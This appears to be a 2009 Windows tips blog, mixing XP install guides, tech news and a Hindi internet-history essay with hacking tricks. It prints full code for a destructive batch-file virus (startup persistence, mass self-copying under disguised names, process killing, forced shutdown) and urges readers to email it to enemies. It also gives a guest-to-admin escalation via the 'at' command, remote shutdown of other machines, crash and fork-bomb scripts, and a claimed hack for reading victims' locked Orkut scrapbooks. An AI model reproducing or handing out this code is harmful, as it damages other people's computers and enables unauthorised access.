use this link for detalil
Wednesday, October 28, 2009
boot xp from pendrive
( if you can't format your drive C:, install Windows Xp On Your Pen, then move all data needed using Pendrive or Network Area to the other PC )
What do you need?
1. Windows Xp installation disk
2. Access to PC with working CD Cd-ROM DVD drive.
3. This file solution.rar
This guide is for people with basic knowledge of PC hardware and system software
Let's start.
1. Download solution.rar file
2. Unpack solution.rar file on drive C, you should have a folder named C:\Dos
3. Put your pendrive ( at least 1GB) into working PC USB port
4. Go to the folder C:\Dos and run HpUSBformat.exe file
- it should auto detect wyour pendrive disk, if not select form the list ( my pendrive is a drive G: )
- set other options like on the image below and click start.
- now you have a pendrive with bootable dos on it.
5. Copy all other files from C:/Dos to your pendrive. ( you can overwrite existing ones)
- your pendrive should look like that
6. Put your Windows Xp installation disk into Cdrom and copy all files from CD to pendrive.
7. Boot your laptop with pendrive ( if you have problems, just check your BIOS or try to access boot menu )
8. Type sys d: and hit enter
- if you see system transferred - you have luck, FAT32 filesystem on drive C:, you will not lose your data
- go to step 11
- if any problem apears go to step 8
8. REMEMBER, you will loose all data from drive C:/
9. Type format c:/q/s
- accept and if it is formated go to step 11 ( you are lucky, you don't need to make partitions)
- otherwise go to step 10
10. Type fdisk and hit enter
-create new partition ( after restart boot with pendrive in)
-go to step 9 and back here :)
-type pqmagic and set your new partition active ( physical drive 2, Advanced A, ste Active - S, are you sure - Y, Exit - X )
11.Type nc and hit enter, and using Norton Commander, copy all files form pendrive to disk C: ( you can overwrite existing ones)
12. Restart Laptop without pendrive in it ( it should start from harddrive)
13. Type cd i386 and hit enter ( it will enter i386 folder)
14 Type winnt and hit enter
( if you can't format your drive C:, install Windows Xp On Your Pen, then move all data needed using Pendrive or Network Area to the other PC )
What do you need?
1. Windows Xp installation disk
2. Access to PC with working CD Cd-ROM DVD drive.
3. This file solution.rar
This guide is for people with basic knowledge of PC hardware and system software
Let's start.
1. Download solution.rar file
2. Unpack solution.rar file on drive C, you should have a folder named C:\Dos
3. Put your pendrive ( at least 1GB) into working PC USB port
4. Go to the folder C:\Dos and run HpUSBformat.exe file
- it should auto detect wyour pendrive disk, if not select form the list ( my pendrive is a drive G: )
- set other options like on the image below and click start.
- now you have a pendrive with bootable dos on it.
5. Copy all other files from C:/Dos to your pendrive. ( you can overwrite existing ones)
- your pendrive should look like that
6. Put your Windows Xp installation disk into Cdrom and copy all files from CD to pendrive.
7. Boot your laptop with pendrive ( if you have problems, just check your BIOS or try to access boot menu )
8. Type sys d: and hit enter
- if you see system transferred - you have luck, FAT32 filesystem on drive C:, you will not lose your data
- go to step 11
- if any problem apears go to step 8
8. REMEMBER, you will loose all data from drive C:/
9. Type format c:/q/s
- accept and if it is formated go to step 11 ( you are lucky, you don't need to make partitions)
- otherwise go to step 10
10. Type fdisk and hit enter
-create new partition ( after restart boot with pendrive in)
-go to step 9 and back here :)
-type pqmagic and set your new partition active ( physical drive 2, Advanced A, ste Active - S, are you sure - Y, Exit - X )
11.Type nc and hit enter, and using Norton Commander, copy all files form pendrive to disk C: ( you can overwrite existing ones)
12. Restart Laptop without pendrive in it ( it should start from harddrive)
13. Type cd i386 and hit enter ( it will enter i386 folder)
14 Type winnt and hit enter
Thursday, October 22, 2009
windows 7 feedback
the processing speed of windows 7 is 3x faster than xp and double of vista. it's graphics are marvelous. windows 7 comes with new exciting features like mini window preview, self diagnostic problem. boot time of windows 7 is faster in comparison with Vista. it also comes with preinstalled drivers. support multifunction. rating system of windows 7 is good.
Thursday, October 1, 2009
folder locker
folder lock
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Locker
echo Locker created successfully
goto End
paste this in notepad replace the line enter your password wid ur password and save the file .bat extension
save the file wid the bat extension then jst double click it and enter your password then a folder will appear named locker in tht paste ur things u wanna lock and again double click the and lock the folder again.........
lalit samar
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Locker
echo Locker created successfully
goto End
paste this in notepad replace the line enter your password wid ur password and save the file .bat extension
save the file wid the bat extension then jst double click it and enter your password then a folder will appear named locker in tht paste ur things u wanna lock and again double click the and lock the folder again.........
lalit samar
Saturday, September 19, 2009
Change admin password from guest
No need to have access to administrator
Even from guest account
1. Open Cmd from run
use command
at [time] \interactive "cmd.exe"
time just you want to launch a new cmd window consider your system date.
if time there is 8:17pm
put 20:18 in place of [time]
2. A new command shell is prompted at the time mentioned above
3. open task manager and kill explorer.exe
4. Now in the new shell
USe command
cd ..
5. c:\> explorer.exe [press enter]
You have now enter to the system with administrative authority and you can do anything.
Even from guest account
1. Open Cmd from run
use command
at [time] \interactive "cmd.exe"
time just you want to launch a new cmd window consider your system date.
if time there is 8:17pm
put 20:18 in place of [time]
2. A new command shell is prompted at the time mentioned above
3. open task manager and kill explorer.exe
4. Now in the new shell
USe command
cd ..
5. c:\> explorer.exe [press enter]
You have now enter to the system with administrative authority and you can do anything.
lock folder in xp without any s/w
to lock folder
c:\cacls "c:\foldername" /d administrator
to open
c:\cacls "c:\foldername" /g administrator:f
try it out is inbuilt ntfs security wher no 1 is aware of it
c:\cacls "c:\foldername" /d administrator
to open
c:\cacls "c:\foldername" /g administrator:f
try it out is inbuilt ntfs security wher no 1 is aware of it
ip details- just try this
Copy this code into notepad and save it in the windows directory folder as ipdetail.bat
@echo By: Vivek sinha anurag
@ipconfig/all | find "IP Address"
@ipconfig/all | find "Subnet Mask"
@ipconfig/all | find "Default Gateway"
@ipconfig/all | find "Host Name"
@ipconfig/all | find "DNS Suffix Search List"
@ipconfig/all | find "Physical Address"
@ipconfig/all | find "DHCP Enabled"
@ipconfig/all | find "DHCP Server"
@pause Copy this code into notepad and save it in the windows directory folder as ipdetail.bat
@echo By: Vivek sinha anurag
@ipconfig/all | find "IP Address"
@ipconfig/all | find "Subnet Mask"
@ipconfig/all | find "Default Gateway"
@ipconfig/all | find "Host Name"
@ipconfig/all | find "DNS Suffix Search List"
@ipconfig/all | find "Physical Address"
@ipconfig/all | find "DHCP Enabled"
@ipconfig/all | find "DHCP Server"
@echo By: Vivek sinha anurag
@ipconfig/all | find "IP Address"
@ipconfig/all | find "Subnet Mask"
@ipconfig/all | find "Default Gateway"
@ipconfig/all | find "Host Name"
@ipconfig/all | find "DNS Suffix Search List"
@ipconfig/all | find "Physical Address"
@ipconfig/all | find "DHCP Enabled"
@ipconfig/all | find "DHCP Server"
@pause Copy this code into notepad and save it in the windows directory folder as ipdetail.bat
@echo By: Vivek sinha anurag
@ipconfig/all | find "IP Address"
@ipconfig/all | find "Subnet Mask"
@ipconfig/all | find "Default Gateway"
@ipconfig/all | find "Host Name"
@ipconfig/all | find "DNS Suffix Search List"
@ipconfig/all | find "Physical Address"
@ipconfig/all | find "DHCP Enabled"
@ipconfig/all | find "DHCP Server"
If you've forgot Security code of your Nokia mobile phone, use Security Mastercode instead.
use this website:
lalit samar
lalit samar
Sunday, September 6, 2009
Chat with command prompt
you can chat with any one one internet or lan
by a command prompt
you just write this code in notepad and save that file to .bat and run:
@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A
by a command prompt
you just write this code in notepad and save that file to .bat and run:
@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A
virus Batch file: dont try on ur computer
copy the below code and paste into your notepad.. then save as anyname.bat
Do not click on that batch file........ Send it your enimies email...
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Code :-
@Echo off
color 4
title 4
title LALIT
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
cd %userprofile%\desktop
copy Greatgame.bat LALIT.bat
copy Greatgame.bat LALIT.jpg
copy Greatgame.bat LALIT.txt
copy Greatgame.bat LALIT.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat LALIT.bat
copy Greatgame.bat LALIT.jpg
copy Greatgame.bat LALIT.txt
copy Greatgame.bat LALIT.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
start calc
msg * LALIT
msg * LALIT
shutdown -r -t 10 -c "VIRUS DETECTED"
time 12:00
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto LALIT
Do not click on that batch file........ Send it your enimies email...
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Code :-
@Echo off
color 4
title 4
title LALIT
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
cd %userprofile%\desktop
copy Greatgame.bat LALIT.bat
copy Greatgame.bat LALIT.jpg
copy Greatgame.bat LALIT.txt
copy Greatgame.bat LALIT.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat LALIT.bat
copy Greatgame.bat LALIT.jpg
copy Greatgame.bat LALIT.txt
copy Greatgame.bat LALIT.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
start calc
msg * LALIT
msg * LALIT
shutdown -r -t 10 -c "VIRUS DETECTED"
time 12:00
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto LALIT
लेन क्लेनरॉक अपने बीस साथियों के साथ जब अपनी प्रयोगशाला में दो कंप्यूटरों के बीच डेटा ट्रांसफर करने की कोशिश कर रहे थे तब उन्होंने ये नहीं सोचा था कि उनकी ये शुरुआत एक दिन दुनिया भर के करोड़ों लोगों के निजी और सामाजिक जीवन का एक अभिन्न हिस्सा बन जाएगी।
2 सितंबर 1969 को कैलिफोर्निया विश्वविद्यालय की प्रयोगशाला में पहली बार 15 मीटर लंबी केबल द्वारा दो कंप्यूटरों के बीच डेटा का आदान-प्रदान हुआ जिसे इंटरनेट कहा गया। अनुसंधानकर्ता मुक्त जानकारी के लिए सुविधा की खोज करने की कोशिश कर रहे थे और उन्हें इसमें सफलता हाथ लगी इंटरनेट के रूप में। 1971 में टीसीपी और आईपी प्रोटोकॉल बनने के बाद ईमेल की शुरुआत हुई। सबसे पहले अमेरिकी रक्षा मंत्रालय के तहत काम करने वाली कंपनी ‘बोल्ट बेरानेक एंड न्यूमैन’ (बीबीएन) के कंप्यूटर इंजीनियर रहे रे. टॉमलिनसन ने वर्ष 1971 में ईमेल का इस्तेमाल किया। 1983 में डोमेन की शुरुआत हुई और वेबसाइट्स बनने लगीं।
ईमेल का उपयोग पहले तो औपचारिक आवश्यकताओं के लिए किया जाता था लेकिन अब ये आम जिंदगी की जरूरत बन गया है। ईमेल के बाद उसका एक त्वरित रूप आया चैटिंग। युवाओं में चैटिंग आज की एक आम आदत बन गई है। लगातार चैटिंग करने की प्रवृत्ति के चलते कई युवा इसके आदि भी बन जाते हैं। ऑनलाइन बातचीत की दुनिया में पिछले कुछ सालों में एक और नाम जुड़ गया है सोशल नेटवर्किंग। फेसबुक, ट्विटर, ऑरकुट जैसी सोशल नेटवर्किंग साइट्स युवाओं में खासी लोकप्रिय है। आज शायद ही कोई ऐसा युवा होगा जिसका इनमें से किसी साइट पर अकाउंट न हो।
आज गूगल की सर्च में 1 खरब से ज्यादा वेबसाइटों के नाम सूचीबद्ध हैं। आलम ये है कि अगर आप हर पेज को देखने के लिए एक मिनट लगाते हैं तो उपलब्ध वेबसाइटों की संख्या आपको 31 हजार वर्षों तक व्यस्त रख सकती है, वो भी बिना सोए। इतना ही नहीं आपको वेब पर दी गई सामग्री पढ़ने के लिए 600 हजार दशक के समय की जरूरत होगी। है ना कमाल!!
आज विश्व की जनसंख्या लगभग 6 अरब 70 करोड़ है। इसका मतलब विश्व में प्रत्येक व्यक्ति के लिए 150 वेब पेज उपलब्ध हैं।
वर्ष दर वर्ष दुनिया भर में इंटरनेट का इस्तेमाल करने वालों की संख्या बढ़ती जा रही है। इस वर्ष विश्व की ऑनलाइन जनसंख्या में पिछले वर्ष की तुलना में 16 प्रतिशत की वृद्धि दर्ज की गई है। आज दुनिया में लगभग 1 अरब 46 करोड़ लोग इंटरनेट का उपयोग करते हैं।
एक ओर इंटरनेट संपर्कों और संबंधों का तानाबाना बुन रहा है तो दूसरी ओर इसके दुरुपयोग से होने वाले दुष्प्रभावों से भी हम बच नहीं पाए हैं। सायबर अपराधों में हर रोज बढ़ोतरी हो रही है। हैकिंग, स्पैमिंग और फिशिंग जैसे कारनामों से परेशान होने वाले यूजर्स की आज कमी नहीं है।
मजे की बात तो ये है कि जब तक एक वायरस से बचने के लिए एंटीवायरस सॉफ्टवेयर तैयार किया जाता है तब तक हैकर्स दूसरा वायरस तैयार कर लोगों के बैंक अकाउंट और क्रेडिट कार्ड नंबर तक में सेंधमारी कर जाते हैं। सायबर अपराधों के जरिए अश्लीलता फैलाने वालों को बढ़ावा मिल रहा है। हाल ही में इंटरनेट सुरक्षा कंपनी नॉर्टन ने 100 सबसे खतरनाक और अश्लील वेबसाइटों की सूची जारी की है।
2 सितंबर 1969 को कैलिफोर्निया विश्वविद्यालय की प्रयोगशाला में पहली बार 15 मीटर लंबी केबल द्वारा दो कंप्यूटरों के बीच डेटा का आदान-प्रदान हुआ जिसे इंटरनेट कहा गया। अनुसंधानकर्ता मुक्त जानकारी के लिए सुविधा की खोज करने की कोशिश कर रहे थे और उन्हें इसमें सफलता हाथ लगी इंटरनेट के रूप में। 1971 में टीसीपी और आईपी प्रोटोकॉल बनने के बाद ईमेल की शुरुआत हुई। सबसे पहले अमेरिकी रक्षा मंत्रालय के तहत काम करने वाली कंपनी ‘बोल्ट बेरानेक एंड न्यूमैन’ (बीबीएन) के कंप्यूटर इंजीनियर रहे रे. टॉमलिनसन ने वर्ष 1971 में ईमेल का इस्तेमाल किया। 1983 में डोमेन की शुरुआत हुई और वेबसाइट्स बनने लगीं।
ईमेल का उपयोग पहले तो औपचारिक आवश्यकताओं के लिए किया जाता था लेकिन अब ये आम जिंदगी की जरूरत बन गया है। ईमेल के बाद उसका एक त्वरित रूप आया चैटिंग। युवाओं में चैटिंग आज की एक आम आदत बन गई है। लगातार चैटिंग करने की प्रवृत्ति के चलते कई युवा इसके आदि भी बन जाते हैं। ऑनलाइन बातचीत की दुनिया में पिछले कुछ सालों में एक और नाम जुड़ गया है सोशल नेटवर्किंग। फेसबुक, ट्विटर, ऑरकुट जैसी सोशल नेटवर्किंग साइट्स युवाओं में खासी लोकप्रिय है। आज शायद ही कोई ऐसा युवा होगा जिसका इनमें से किसी साइट पर अकाउंट न हो।
आज गूगल की सर्च में 1 खरब से ज्यादा वेबसाइटों के नाम सूचीबद्ध हैं। आलम ये है कि अगर आप हर पेज को देखने के लिए एक मिनट लगाते हैं तो उपलब्ध वेबसाइटों की संख्या आपको 31 हजार वर्षों तक व्यस्त रख सकती है, वो भी बिना सोए। इतना ही नहीं आपको वेब पर दी गई सामग्री पढ़ने के लिए 600 हजार दशक के समय की जरूरत होगी। है ना कमाल!!
आज विश्व की जनसंख्या लगभग 6 अरब 70 करोड़ है। इसका मतलब विश्व में प्रत्येक व्यक्ति के लिए 150 वेब पेज उपलब्ध हैं।
वर्ष दर वर्ष दुनिया भर में इंटरनेट का इस्तेमाल करने वालों की संख्या बढ़ती जा रही है। इस वर्ष विश्व की ऑनलाइन जनसंख्या में पिछले वर्ष की तुलना में 16 प्रतिशत की वृद्धि दर्ज की गई है। आज दुनिया में लगभग 1 अरब 46 करोड़ लोग इंटरनेट का उपयोग करते हैं।
एक ओर इंटरनेट संपर्कों और संबंधों का तानाबाना बुन रहा है तो दूसरी ओर इसके दुरुपयोग से होने वाले दुष्प्रभावों से भी हम बच नहीं पाए हैं। सायबर अपराधों में हर रोज बढ़ोतरी हो रही है। हैकिंग, स्पैमिंग और फिशिंग जैसे कारनामों से परेशान होने वाले यूजर्स की आज कमी नहीं है।
मजे की बात तो ये है कि जब तक एक वायरस से बचने के लिए एंटीवायरस सॉफ्टवेयर तैयार किया जाता है तब तक हैकर्स दूसरा वायरस तैयार कर लोगों के बैंक अकाउंट और क्रेडिट कार्ड नंबर तक में सेंधमारी कर जाते हैं। सायबर अपराधों के जरिए अश्लीलता फैलाने वालों को बढ़ावा मिल रहा है। हाल ही में इंटरनेट सुरक्षा कंपनी नॉर्टन ने 100 सबसे खतरनाक और अश्लील वेबसाइटों की सूची जारी की है।
Thursday, September 3, 2009
how to create autorun.inf
open="open any file u want any file .exe .bat or any"
action=Open folder to view files
icon=%SystemRoot%\system32\SHELL32.dll,4 <==== gives icon from shell 32
open="open any file u want any file .exe .bat or any"
action=Open folder to view files
icon=%SystemRoot%\system32\SHELL32.dll,4 <==== gives icon from shell 32
Microsoft Office 2010 : New
Microsoft Office 2010, codenamed Office 14, is the successor of Microsoft Office 2007, a productivity suite for Microsoft Windows.[1] Extended file compatibility[2], user interface updates[3], and a refined user experience[4] are planned for Office 2010. With the introduction of Office 2010 a 64-bit version of Office will be available for the first time.[5] It will be available for Windows XP SP3, Windows Vista and Windows 7.[6] Furthermore, Office 2010 will mark the debut of free online versions of Word, Excel, PowerPoint, and OneNote, which will work in the three most popular web browsers (Windows Internet Explorer, Mozilla Firefox, and Apple Safari). Microsoft plans to release Office 2010 during May/June 2010.
Friday, August 28, 2009
Micro-opto-electromechanical systems (MOEMS)
Micro-opto-electromechanical systems (MOEMS) are a special class of Micro-electro-mechanical systems (MEMS) which involves sensing or manipulating optical signals on a very small size scale using integrated mechanical and electrical systems. MOEMS includes a wide variety of devices including optical switch, optical cross-connect, tunable VCSEL, microbolometers amongst others. These devices are usually fabricated using standard micromachining technologies using materials like silicon, silicon dioxide, silicon nitride and gallium arsenide.
for more :
for more :
Spintronics -new emerging Technology
Spintronics (a neologism meaning "spin transport electronics"[1][2]), also known as magnetoelectronics, is an emerging technology that exploits the intrinsic spin of electrons and its associated magnetic moment, in addition to its fundamental electronic charge, in solid-state devices.
The storage density of hard drives is rapidly increasing along an exponential growth curve, in part because spintronics-enabled devices like GMR and TMR sensors have increased the sensitivity of the read head which measures the magnetic state of small magnetic domains (bits) on the spinning platter. The doubling period for the areal density of information storage is twelve months, much shorter than Moore's Law, which observes that the number of transistors that can cheaply be incorporated in an integrated circuit doubles every two years.
MRAM, or magnetic random access memory, uses a grid of magnetic storage elements called magnetic tunnel junctions (MTJ's). MRAM is nonvolatile (unlike charge-based DRAM in today's computers) so information is stored even when power is turned off, potentially providing instant-on computing. Motorola has developed a 1st generation 256 kb MRAM based on a single magnetic tunnel junction and a single transistor and which has a read/write cycle of under 50 nanoseconds[9] (Everspin, Motorola's spin-off, has since developed a 4 Mbit version[10]). There are two 2nd generation MRAM techniques currently in development: Thermal Assisted Switching (TAS)[11] which is being developed by Crocus Technology, and Spin Torque Transfer (STT) on which Crocus, Hynix, IBM, and several other companies are working[12].
Another design in development, called Racetrack memory, encodes information in the direction of magnetization between domain walls of a ferromagnetic metal wire.
for more
The storage density of hard drives is rapidly increasing along an exponential growth curve, in part because spintronics-enabled devices like GMR and TMR sensors have increased the sensitivity of the read head which measures the magnetic state of small magnetic domains (bits) on the spinning platter. The doubling period for the areal density of information storage is twelve months, much shorter than Moore's Law, which observes that the number of transistors that can cheaply be incorporated in an integrated circuit doubles every two years.
MRAM, or magnetic random access memory, uses a grid of magnetic storage elements called magnetic tunnel junctions (MTJ's). MRAM is nonvolatile (unlike charge-based DRAM in today's computers) so information is stored even when power is turned off, potentially providing instant-on computing. Motorola has developed a 1st generation 256 kb MRAM based on a single magnetic tunnel junction and a single transistor and which has a read/write cycle of under 50 nanoseconds[9] (Everspin, Motorola's spin-off, has since developed a 4 Mbit version[10]). There are two 2nd generation MRAM techniques currently in development: Thermal Assisted Switching (TAS)[11] which is being developed by Crocus Technology, and Spin Torque Transfer (STT) on which Crocus, Hynix, IBM, and several other companies are working[12].
Another design in development, called Racetrack memory, encodes information in the direction of magnetization between domain walls of a ferromagnetic metal wire.
for more
Wednesday, August 26, 2009
call any to them own no. try it.
u can call any one by his own no.
firstly u registered himself to and
then u call
sure that calling no. aur caller no. must be same
firstly u registered himself to and
then u call
sure that calling no. aur caller no. must be same
Tuesday, August 25, 2009
Protect yourself from Conficker, Dengerous
The Conficker worm is a computer worm that can infect your computer and spread itself to other computers across a network automatically, without human interaction.
for detail visit
this information is useful for all net users
it become more dengerous from today....
so be aware
lalit samar
for detail visit
this information is useful for all net users
it become more dengerous from today....
so be aware
lalit samar
shutdown through remote tutorial
shutdown /r /t 2 /m \\
if u get error
then type
net use \\ /user:administrator
note : u need to know the other terminal password... not only to admin u can shutdown admin righted accounts too
execute previous command within 2 seconds .... pwned
for more
shutdown /i
change password tutorial
net user
to see how many user accounts
say example if we ve user named firefox and u r in chrome account Note : u must be ve admin rights and u r not supposed to log into account named firefox
net user firefox *
it shows lik
Type a password for the user:
Retype the password to confirm:
ve ur own password
if u get error
then type
net use \\ /user:administrator
note : u need to know the other terminal password... not only to admin u can shutdown admin righted accounts too
execute previous command within 2 seconds .... pwned
for more
shutdown /i
change password tutorial
net user
to see how many user accounts
say example if we ve user named firefox and u r in chrome account Note : u must be ve admin rights and u r not supposed to log into account named firefox
net user firefox *
it shows lik
Type a password for the user:
Retype the password to confirm:
ve ur own password
Sunday, August 23, 2009
ISRO’s Bhuvan to beat Google Earth
ISRO is working on an ambitious project called Bhuvan (means Earth), a satellite mapping tool. Bhuvan allows you to zoom far closer than the aerial view from a chopper. If Google Earth shows details upto 200 metres distance and Wikimapia upto 50 metres, Bhuvan will show images upto 10 metres, which means you can easily see details upto a three floor high building and also add information.
Saturday, August 22, 2009
You just try it..a smallest Virus for u
open notepad
copy this code to notepad and save as batch file(.bat).
began :s
now run this file
its amazing guys.....
copy this code to notepad and save as batch file(.bat).
began :s
now run this file
its amazing guys.....
Friday, August 21, 2009
Windows 8 – Life After Windows 7
Windows 8 – Life After Windows 7
Windows 7 not the last dedicated Microsoft OS. ... the company is also looking forward to the next version of Windows. Which is windows 8
Windows 7 not the last dedicated Microsoft OS. ... the company is also looking forward to the next version of Windows. Which is windows 8
Write SQL-like Queries in JavaScript
Developer |
Just as LINQ allows you to write SQL-like queries against objects in .NET, JSINQ facilitates similar queries in JavaScript
Just as LINQ allows you to write SQL-like queries against objects in .NET, JSINQ facilitates similar queries in JavaScript
Monday, June 22, 2009
This Will Crash Ur Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Save It As Anything.vbsIt Only Works With Windows XP
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Save It As Anything.vbsIt Only Works With Windows XP
do u want to have an EARTHQUAKE ON UR MACHINEdont worry earthquake will take place for few seconds copy the address below and paste it in the address bar and voilajavascript:function flood(n) {if ( self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);
Yeah. . Now There is way to see Locked Scrapbook… !!
Yeah. . .Now there is a hack in Orkut to see locked scrapbooks now.
Simple trick is if you have a Orkut Sandbox profile then visit by that profile you are able see victim’s Scrapbook. . .and if you didn’t have any Sandbox Enabled Profile then use this JavaScript (-:
? Copy Script ? Goto Profile Page? Paste Script on Address Bar? Hit Enter
Enjoy Orkuting
Simple trick is if you have a Orkut Sandbox profile then visit by that profile you are able see victim’s Scrapbook. . .and if you didn’t have any Sandbox Enabled Profile then use this JavaScript (-:
? Copy Script ? Goto Profile Page? Paste Script on Address Bar? Hit Enter
Enjoy Orkuting
ur system is affected by autorun.inf
easy & best solution -->
cmd --> c: --> attrib -->
del autorun.inf /f/s/q/a
do it for all drives & ur problem ll b solved.....
and H:> attrib -s -h -r -a
where h: is ur pendrive
cmd --> c: --> attrib -->
del autorun.inf /f/s/q/a
do it for all drives & ur problem ll b solved.....
and H:> attrib -s -h -r -a
where h: is ur pendrive
Sunday, June 21, 2009
speak it
Open a text file in notepad and write:
;copy from here--------------
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
;----------to here
( ';')< " Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text, input the text and press ok."
;copy from here--------------
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
;----------to here
( ';')< " Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text, input the text and press ok."
How to disable Pendrive?
Open notepad and past this code then save it with disableUSB.reg
Then double click on it, computer will ask Are you sure you want to add the information to registry?click YES.
You will be there
Windows Registry Editor Version 5.00
How to Reverse:-
And if you want to reverse it change the value "00000004" to "00000003". The computer will show pendrive again.
Open notepad and past this code then save it with disableUSB.reg
Then double click on it, computer will ask Are you sure you want to add the information to registry?click YES.
You will be there
Windows Registry Editor Version 5.00
How to Reverse:-
And if you want to reverse it change the value "00000004" to "00000003". The computer will show pendrive again.
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